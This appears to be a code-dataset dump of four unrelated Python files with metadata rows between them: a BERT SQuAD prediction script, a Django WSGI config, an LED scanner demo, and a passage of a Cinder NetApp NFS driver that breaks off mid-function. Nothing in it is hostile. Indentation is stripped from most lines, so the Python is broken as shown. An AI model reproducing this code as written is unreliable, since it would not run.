writer.write(json.dumps(all_predictions, indent=4) + "\n")
with tf.gfile.GFile(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if FLAGS.version_2_with_negative:
with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
    # Therefore, we have to apply a semi-complicated alignment heuristic between
    # `pred_text` and `orig_text` to get a character-to-character alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.logging.info(
"Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.logging.info(
"Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text,
tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(
enumerate(logits),
key=lambda x: x[1],
reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, filename, is_training):
self.filename = filename
self.is_training = is_training
self.num_features = 0
self._writer = tf.python_io.TFRecordWriter(filename)
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
self.num_features += 1
def create_int_feature(values):
feature = tf.train.Feature(
int64_list=tf.train.Int64List(value=list(values)))
return feature
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
if self.is_training:
features["start_positions"] = create_int_feature(
[feature.start_position])
features["end_positions"] = create_int_feature(
[feature.end_position])
impossible = 0
if feature.is_impossible:
impossible = 1
features["is_impossible"] = create_int_feature([impossible])
tf_example = tf.train.Example(
features=tf.train.Features(
feature=features))
self._writer.write(tf_example.SerializeToString())
def close(self):
self._writer.close()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError(
"At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.gfile.MakeDirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
if FLAGS.do_train:
train_examples = read_squad_examples(
input_file=FLAGS.train_file, is_training=True)
num_train_steps = int(
len(train_examples) /
FLAGS.train_batch_size *
FLAGS.num_train_epochs)
num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)
# Pre-shuffle the input to avoid having to make a very large shuffle
        # buffer in the `input_fn`.
rng = random.Random(12345)
rng.shuffle(train_examples)
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
if FLAGS.do_train:
# We write to a temporary file to avoid storing very large constant tensors
# in memory.
train_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "train.tf_record"),
is_training=True)
convert_examples_to_features(
examples=train_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=True,
output_fn=train_writer.process_feature)
train_writer.close()
tf.logging.info("***** Running training *****")
tf.logging.info(" Num orig examples = %d", len(train_examples))
tf.logging.info(" Num split examples = %d", train_writer.num_features)
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
tf.logging.info(" Num steps = %d", num_train_steps)
del train_examples
train_input_fn = input_fn_builder(
input_file=train_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=True,
drop_remainder=True)
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
if FLAGS.do_predict:
eval_examples = read_squad_examples(
input_file=FLAGS.predict_file, is_training=False)
eval_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "eval.tf_record"),
is_training=False)
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
convert_examples_to_features(
examples=eval_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature)
eval_writer.close()
tf.logging.info("***** Running predictions *****")
tf.logging.info(" Num orig examples = %d", len(eval_examples))
tf.logging.info(" Num split examples = %d", len(eval_features))
tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
all_results = []
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False)
# If running eval on the TPU, you will need to specify the number of
# steps.
all_results = []
for result in estimator.predict(
predict_input_fn, yield_single_examples=True):
if len(all_results) % 1000 == 0:
tf.logging.info("Processing example: %d" % (len(all_results)))
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(
RawResult(
unique_id=unique_id,
start_logits=start_logits,
end_logits=end_logits))
output_prediction_file = os.path.join(
FLAGS.output_dir, "predictions.json")
output_nbest_file = os.path.join(
FLAGS.output_dir, "nbest_predictions.json")
output_null_log_odds_file = os.path.join(
FLAGS.output_dir, "null_odds.json")
write_predictions(eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file)
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| [
"[email protected]"
] | |
81a8f7309966861e6a73d3cea111f8f0f441759e | 153d5ff918a33afb1e73fefab9e774672cf4f129 | /auth_demo_stripe/wsgi.py | 06be555707e70f63105bf12ae7bbb1f7f8d691c1 | [] | no_license | meganduffy/auth_demo_stripe | a67700e406fab62091ab52bbb72b0eede89c1f72 | 74c6e1d2af19221d78c4eb813513e5f1d36c3abe | refs/heads/master | 2021-01-17T10:01:22.309264 | 2017-03-06T11:44:39 | 2017-03-06T11:44:39 | 84,001,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for auth_demo_stripe project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "auth_demo_stripe.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
26c1bf3393e74fe359f62019bcd01a096dc2a25a | f662aa3ce7896ca0283cae38df8ef824c1b80c9a | /examples/larson_hue.py | e59f5ae5199f37f0ab3c97b555d030f940ee0d49 | [
"MIT"
] | permissive | pimoroni/plasma | bd7ddebbc60ae7cc9c2561408b52fc46bf810672 | 7857c44255285aac061a9064dd033fd63bbbda29 | refs/heads/master | 2023-02-10T13:27:17.565867 | 2023-01-30T17:27:28 | 2023-01-30T17:27:28 | 155,544,928 | 12 | 9 | MIT | 2021-11-06T04:14:19 | 2018-10-31T11:17:40 | Python | UTF-8 | Python | false | false | 1,548 | py | #!/usr/bin/env python3
import math
import time
import colorsys
from plasma import auto
NUM_PIXELS = 10 * 4
FALLOFF = 1.9
SCAN_SPEED = 4
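# FALLOFF controls how quickly brightness drops off either side of the
# scanning "eye"; SCAN_SPEED scales time inside the sine wave below.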
plasma = auto(default=f"GPIO:14:15:pixel_count={NUM_PIXELS}")
if plasma.get_pixel_count() == 1:
raise RuntimeError("Uh, you can't larson scan *one* pixel!?")
plasma.set_clear_on_exit()
start_time = time.time()
while True:
delta = (time.time() - start_time)
# Offset is a sine wave derived from the time delta
# we use this to animate both the hue and larson scan
# so they are kept in sync with each other
offset = (math.sin(delta * SCAN_SPEED) + 1) / 2
# Use offset to pick the right colour from the hue wheel
hue = int(round(offset * 360))
    # Maximum pixel index, based on NUM_PIXELS
max_val = plasma.get_pixel_count() - 1
# Now we generate a value from 0 to max_val
offset = int(round(offset * max_val))
for x in range(plasma.get_pixel_count()):
sat = 1.0
val = max_val - (abs(offset - x) * FALLOFF)
val /= float(max_val) # Convert to 0.0 to 1.0
val = max(val, 0.0) # Ditch negative values
xhue = hue # Grab hue for this pixel
xhue += (1 - val) * 10 # Use the val offset to give a slight colour trail variation
xhue %= 360 # Clamp to 0-359
xhue /= 360.0 # Convert to 0.0 to 1.0
r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(xhue, sat, val)]
plasma.set_pixel(x, r, g, b, val)
plasma.show()
time.sleep(0.001)
| [
"[email protected]"
] | |
9d14d6702c380b23bdbc1f209bb5f8a3e6a6beb7 | 46bab53f41324fa880626d80c7a175e11ec30f5b | /sinar/representatives/setuphandlers.py | f322b7a6cba088432f71f03cc810a8c9149343b1 | [] | no_license | joemariedimzon/sinar.representatives | 8d21b5447b65f55fbde809c74dc74be6bc0bfdf7 | 11d63647a1d82c739a6d4312363392f8a6ca79ed | refs/heads/master | 2021-01-18T05:00:12.128279 | 2015-07-07T07:51:19 | 2015-07-07T07:51:19 | 38,667,596 | 0 | 0 | null | 2015-07-07T06:07:04 | 2015-07-07T06:07:03 | null | UTF-8 | Python | false | false | 384 | py | from collective.grok import gs
from sinar.representatives import MessageFactory as _
@gs.importstep(
name=u'sinar.representatives',
title=_('sinar.representatives import handler'),
description=_(''))
def setupVarious(context):
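    # Standard GenericSetup guard: the marker file only ships with this
    # package's profile, so the handler is a no-op for other profiles.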
if context.readDataFile('sinar.representatives.marker.txt') is None:
return
portal = context.getSite()
# do anything here
| [
"[email protected]"
] | |
a52afad79d275173735bfbc72a33cf1ba2a7a17e | a217801fdf840d97785f06a1e2381d6ed62d7852 | /volume/drivers/netapp/dataontap/nfs_base.py | 1e7c08ae0f1bae744bd926cd2f9e9962e8f06264 | [] | no_license | TonyChengTW/Cinder_Extend | fb05cdda9d925d1c8344595a19472125959e4830 | 5e20383660cf5c0340aa8fa3cf387bb8b59efc4b | refs/heads/master | 2020-06-18T09:54:06.834743 | 2016-11-30T03:01:16 | 2016-11-30T03:01:16 | 75,145,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,631 | py | # Copyright (c) 2012 NetApp, Inc. All rights reserved.
# Copyright (c) 2014 Ben Swartzlander. All rights reserved.
# Copyright (c) 2014 Navneet Singh. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2014 Bob Callaway. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume driver for NetApp NFS storage.
"""
import math
import os
import re
import shutil
import threading
import time
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import units
import six.moves.urllib.parse as urlparse
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import image_utils
from cinder import utils
from cinder.volume.drivers.netapp import options as na_opts
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.volume.drivers import nfs
LOG = logging.getLogger(__name__)
class NetAppNfsDriver(nfs.NfsDriver):
"""Base class for NetApp NFS driver for Data ONTAP."""
# do not increment this as it may be used in volume type definitions
VERSION = "1.0.0"
REQUIRED_FLAGS = ['netapp_login', 'netapp_password',
'netapp_server_hostname']
def __init__(self, *args, **kwargs):
na_utils.validate_instantiation(**kwargs)
self._execute = None
self._context = None
self._app_version = kwargs.pop("app_version", "unknown")
super(NetAppNfsDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(na_opts.netapp_connection_opts)
self.configuration.append_config_values(na_opts.netapp_basicauth_opts)
self.configuration.append_config_values(na_opts.netapp_transport_opts)
self.configuration.append_config_values(na_opts.netapp_img_cache_opts)
self.configuration.append_config_values(na_opts.netapp_nfs_extra_opts)
def set_execute(self, execute):
self._execute = execute
def do_setup(self, context):
super(NetAppNfsDriver, self).do_setup(context)
self._context = context
na_utils.check_flags(self.REQUIRED_FLAGS, self.configuration)
self.zapi_client = None
def check_for_setup_error(self):
"""Returns an error if prerequisites aren't met."""
super(NetAppNfsDriver, self).check_for_setup_error()
def get_pool(self, volume):
"""Return pool name where volume resides.
:param volume: The volume hosted by the driver.
:return: Name of the pool where given volume is hosted.
"""
return volume['provider_location']
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
vol_size = volume.size
snap_size = snapshot.volume_size
self._clone_volume(snapshot.name, volume.name, snapshot.volume_id)
share = self._get_volume_location(snapshot.volume_id)
volume['provider_location'] = share
path = self.local_path(volume)
run_as_root = self._execute_as_root
if self._discover_file_till_timeout(path):
self._set_rw_permissions(path)
if vol_size != snap_size:
try:
self.extend_volume(volume, vol_size)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(
_LE("Resizing %s failed. Cleaning volume."),
volume.name)
self._execute('rm', path, run_as_root=run_as_root)
else:
raise exception.CinderException(
_("NFS file %s not discovered.") % volume['name'])
return {'provider_location': volume['provider_location']}
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
self._clone_volume(snapshot['volume_name'],
snapshot['name'],
snapshot['volume_id'])
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
nfs_mount = self._get_provider_location(snapshot.volume_id)
if self._volume_not_present(nfs_mount, snapshot.name):
return True
self._execute('rm', self._get_volume_path(nfs_mount, snapshot.name),
run_as_root=self._execute_as_root)
def _get_volume_location(self, volume_id):
"""Returns NFS mount address as <nfs_ip_address>:<nfs_mount_dir>."""
nfs_server_ip = self._get_host_ip(volume_id)
export_path = self._get_export_path(volume_id)
return nfs_server_ip + ':' + export_path
def _clone_volume(self, volume_name, clone_name, volume_id, share=None):
"""Clones mounted volume using NetApp API."""
raise NotImplementedError()
def _get_provider_location(self, volume_id):
"""Returns provider location for given volume."""
volume = self.db.volume_get(self._context, volume_id)
return volume.provider_location
def _get_host_ip(self, volume_id):
"""Returns IP address for the given volume."""
return self._get_provider_location(volume_id).rsplit(':')[0]
def _get_export_path(self, volume_id):
"""Returns NFS export path for the given volume."""
return self._get_provider_location(volume_id).rsplit(':')[1]
def _volume_not_present(self, nfs_mount, volume_name):
"""Check if volume exists."""
try:
self._try_execute('ls', self._get_volume_path(nfs_mount,
volume_name))
except processutils.ProcessExecutionError:
# If the volume isn't present
return True
return False
def _try_execute(self, *command, **kwargs):
# NOTE(vish): Volume commands can partially fail due to timing, but
# running them a second time on failure will usually
# recover nicely.
tries = 0
while True:
try:
self._execute(*command, **kwargs)
return True
except processutils.ProcessExecutionError:
tries += 1
if tries >= self.configuration.num_shell_tries:
raise
LOG.exception(_LE("Recovering from a failed execute. "
"Try number %s"), tries)
time.sleep(tries ** 2)
def _get_volume_path(self, nfs_share, volume_name):
"""Get volume path (local fs path) for given volume name on given nfs
share.
@param nfs_share string, example 172.18.194.100:/var/nfs
@param volume_name string,
example volume-91ee65ec-c473-4391-8c09-162b00c68a8c
"""
return os.path.join(self._get_mount_point_for_share(nfs_share),
volume_name)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
vol_size = volume.size
src_vol_size = src_vref.size
self._clone_volume(src_vref.name, volume.name, src_vref.id)
share = self._get_volume_location(src_vref.id)
volume['provider_location'] = share
path = self.local_path(volume)
if self._discover_file_till_timeout(path):
self._set_rw_permissions(path)
if vol_size != src_vol_size:
try:
self.extend_volume(volume, vol_size)
except Exception as e:
LOG.error(
_LE("Resizing %s failed. Cleaning volume."),
volume.name)
self._execute('rm', path,
run_as_root=self._execute_as_root)
raise e
else:
raise exception.CinderException(
_("NFS file %s not discovered.") % volume['name'])
return {'provider_location': volume['provider_location']}
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
raise NotImplementedError()
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
super(NetAppNfsDriver, self).copy_image_to_volume(
context, volume, image_service, image_id)
LOG.info(_LI('Copied image to volume %s using regular download.'),
volume['name'])
self._register_image_in_cache(volume, image_id)
def _register_image_in_cache(self, volume, image_id):
"""Stores image in the cache."""
file_name = 'img-cache-%s' % image_id
LOG.info(_LI("Registering image in cache %s"), file_name)
try:
self._do_clone_rel_img_cache(
volume['name'], file_name,
volume['provider_location'], file_name)
except Exception as e:
LOG.warning(_LW('Exception while registering image %(image_id)s'
' in cache. Exception: %(exc)s')
% {'image_id': image_id, 'exc': e.__str__()})
def _find_image_in_cache(self, image_id):
"""Finds image in cache and returns list of shares with file name."""
result = []
if getattr(self, '_mounted_shares', None):
for share in self._mounted_shares:
dir = self._get_mount_point_for_share(share)
file_name = 'img-cache-%s' % image_id
file_path = '%s/%s' % (dir, file_name)
if os.path.exists(file_path):
LOG.debug('Found cache file for image %(image_id)s'
' on share %(share)s'
% {'image_id': image_id, 'share': share})
result.append((share, file_name))
return result
def _do_clone_rel_img_cache(self, src, dst, share, cache_file):
"""Do clone operation w.r.t image cache file."""
@utils.synchronized(cache_file, external=True)
def _do_clone():
dir = self._get_mount_point_for_share(share)
file_path = '%s/%s' % (dir, dst)
if not os.path.exists(file_path):
LOG.info(_LI('Cloning from cache to destination %s'), dst)
self._clone_volume(src, dst, volume_id=None, share=share)
_do_clone()
@utils.synchronized('clean_cache')
def _spawn_clean_cache_job(self):
"""Spawns a clean task if not running."""
if getattr(self, 'cleaning', None):
LOG.debug('Image cache cleaning in progress. Returning... ')
return
else:
# Set cleaning to True
self.cleaning = True
t = threading.Timer(0, self._clean_image_cache)
t.start()
def _clean_image_cache(self):
"""Clean the image cache files in cache of space crunch."""
try:
LOG.debug('Image cache cleaning in progress.')
thres_size_perc_start =\
self.configuration.thres_avl_size_perc_start
thres_size_perc_stop = \
self.configuration.thres_avl_size_perc_stop
for share in getattr(self, '_mounted_shares', []):
try:
total_size, total_avl = \
self._get_capacity_info(share)
avl_percent = int((total_avl / total_size) * 100)
if avl_percent <= thres_size_perc_start:
LOG.info(_LI('Cleaning cache for share %s.'), share)
eligible_files = self._find_old_cache_files(share)
threshold_size = int(
(thres_size_perc_stop * total_size) / 100)
bytes_to_free = int(threshold_size - total_avl)
LOG.debug('Files to be queued for deletion %s',
eligible_files)
self._delete_files_till_bytes_free(
eligible_files, share, bytes_to_free)
else:
continue
except Exception as e:
LOG.warning(_LW('Exception during cache cleaning'
' %(share)s. Message - %(ex)s')
% {'share': share, 'ex': e.__str__()})
continue
finally:
LOG.debug('Image cache cleaning done.')
self.cleaning = False
def _shortlist_del_eligible_files(self, share, old_files):
"""Prepares list of eligible files to be deleted from cache."""
raise NotImplementedError()
def _find_old_cache_files(self, share):
"""Finds the old files in cache."""
mount_fs = self._get_mount_point_for_share(share)
threshold_minutes = self.configuration.expiry_thres_minutes
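        # 'find -amin +N' matches cache files last accessed more than N
        # (expiry_thres_minutes) minutes ago.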
cmd = ['find', mount_fs, '-maxdepth', '1', '-name',
'img-cache*', '-amin', '+%s' % threshold_minutes]
res, _err = self._execute(*cmd, run_as_root=self._execute_as_root)
if res:
old_file_paths = res.strip('\n').split('\n')
mount_fs_len = len(mount_fs)
old_files = [x[mount_fs_len + 1:] for x in old_file_paths]
eligible_files = self._shortlist_del_eligible_files(
share, old_files)
return eligible_files
return []
def _delete_files_till_bytes_free(self, file_list, share, bytes_to_free=0):
"""Delete files from disk till bytes are freed or list exhausted."""
LOG.debug('Bytes to free %s', bytes_to_free)
if file_list and bytes_to_free > 0:
sorted_files = sorted(file_list, key=lambda x: x[1], reverse=True)
mount_fs = self._get_mount_point_for_share(share)
for f in sorted_files:
if f:
file_path = '%s/%s' % (mount_fs, f[0])
LOG.debug('Delete file path %s', file_path)
@utils.synchronized(f[0], external=True)
def _do_delete():
if self._delete_file(file_path):
return True
return False
if _do_delete():
bytes_to_free -= int(f[1])
if bytes_to_free <= 0:
return
def _delete_file(self, path):
"""Delete file from disk and return result as boolean."""
try:
LOG.debug('Deleting file at path %s', path)
cmd = ['rm', '-f', path]
self._execute(*cmd, run_as_root=self._execute_as_root)
return True
except Exception as ex:
LOG.warning(_LW('Exception during deleting %s'), ex.__str__())
return False
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
"""Create a volume efficiently from an existing image.
image_location is a string whose format depends on the
image service backend in use. The driver should use it
to determine whether cloning is possible.
Returns a dict of volume properties eg. provider_location,
boolean indicating whether cloning occurred.
"""
image_id = image_meta['id']
cloned = False
post_clone = False
try:
cache_result = self._find_image_in_cache(image_id)
if cache_result:
cloned = self._clone_from_cache(volume, image_id, cache_result)
else:
cloned = self._direct_nfs_clone(volume, image_location,
image_id)
if cloned:
post_clone = self._post_clone_image(volume)
except Exception as e:
msg = e.msg if getattr(e, 'msg', None) else e.__str__()
LOG.info(_LI('Image cloning unsuccessful for image'
' %(image_id)s. Message: %(msg)s')
% {'image_id': image_id, 'msg': msg})
vol_path = self.local_path(volume)
volume['provider_location'] = None
if os.path.exists(vol_path):
self._delete_file(vol_path)
finally:
cloned = cloned and post_clone
share = volume['provider_location'] if cloned else None
bootable = True if cloned else False
return {'provider_location': share, 'bootable': bootable}, cloned
def _clone_from_cache(self, volume, image_id, cache_result):
"""Clones a copy from image cache."""
cloned = False
LOG.info(_LI('Cloning image %s from cache'), image_id)
for res in cache_result:
# Repeat tries in other shares if failed in some
(share, file_name) = res
LOG.debug('Cache share: %s', share)
if (share and
self._is_share_vol_compatible(volume, share)):
try:
self._do_clone_rel_img_cache(
file_name, volume['name'], share, file_name)
cloned = True
volume['provider_location'] = share
break
except Exception:
LOG.warning(_LW('Unexpected exception during'
' image cloning in share %s'), share)
return cloned
def _direct_nfs_clone(self, volume, image_location, image_id):
"""Clone directly in nfs share."""
LOG.info(_LI('Checking image clone %s from glance share.'), image_id)
cloned = False
image_locations = self._construct_image_nfs_url(image_location)
run_as_root = self._execute_as_root
for loc in image_locations:
share = self._is_cloneable_share(loc)
if share and self._is_share_vol_compatible(volume, share):
LOG.debug('Share is cloneable %s', share)
volume['provider_location'] = share
(__, ___, img_file) = loc.rpartition('/')
dir_path = self._get_mount_point_for_share(share)
img_path = '%s/%s' % (dir_path, img_file)
img_info = image_utils.qemu_img_info(img_path,
run_as_root=run_as_root)
if img_info.file_format == 'raw':
LOG.debug('Image is raw %s', image_id)
self._clone_volume(
img_file, volume['name'],
volume_id=None, share=share)
cloned = True
break
else:
LOG.info(
_LI('Image will locally be converted to raw %s'),
image_id)
dst = '%s/%s' % (dir_path, volume['name'])
image_utils.convert_image(img_path, dst, 'raw',
run_as_root=run_as_root)
data = image_utils.qemu_img_info(dst,
run_as_root=run_as_root)
if data.file_format != "raw":
raise exception.InvalidResults(
_("Converted to raw, but"
" format is now %s") % data.file_format)
else:
cloned = True
self._register_image_in_cache(
volume, image_id)
break
return cloned
def _post_clone_image(self, volume):
"""Do operations post image cloning."""
LOG.info(_LI('Performing post clone for %s'), volume['name'])
vol_path = self.local_path(volume)
if self._discover_file_till_timeout(vol_path):
self._set_rw_permissions(vol_path)
self._resize_image_file(vol_path, volume['size'])
return True
raise exception.InvalidResults(
_("NFS file could not be discovered."))
def _resize_image_file(self, path, new_size):
"""Resize the image file on share to new size."""
LOG.debug('Checking file for resize')
if self._is_file_size_equal(path, new_size):
return
else:
LOG.info(_LI('Resizing file to %sG'), new_size)
image_utils.resize_image(path, new_size,
run_as_root=self._execute_as_root)
if self._is_file_size_equal(path, new_size):
return
else:
raise exception.InvalidResults(
_('Resizing image file failed.'))
def _is_file_size_equal(self, path, size):
"""Checks if file size at path is equal to size."""
data = image_utils.qemu_img_info(path,
run_as_root=self._execute_as_root)
virt_size = data.virtual_size / units.Gi
if virt_size == size:
return True
else:
return False
def _discover_file_till_timeout(self, path, timeout=45):
"""Checks if file size at path is equal to size."""
# Sometimes nfs takes time to discover file
# Retrying in case any unexpected situation occurs
retry_seconds = timeout
sleep_interval = 2
while True:
if os.path.exists(path):
return True
else:
if retry_seconds <= 0:
LOG.warning(_LW('Discover file retries exhausted.'))
return False
else:
time.sleep(sleep_interval)
retry_seconds -= sleep_interval
def _is_cloneable_share(self, image_location):
"""Finds if the image at location is cloneable."""
conn, dr = self._check_get_nfs_path_segs(image_location)
return self._check_share_in_use(conn, dr)
def _check_get_nfs_path_segs(self, image_location):
"""Checks if the nfs path format is matched.
WebNFS url format with relative-path is supported.
Accepting all characters in path-names and checking
against the mounted shares which will contain only
allowed path segments. Returns connection and dir details.
"""
conn, dr = None, None
if image_location:
nfs_loc_pattern = \
('^nfs://(([\w\-\.]+:{1}[\d]+|[\w\-\.]+)(/[^\/].*)'
'*(/[^\/\\\\]+)$)')
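            # Illustrative example (values invented for this comment): for
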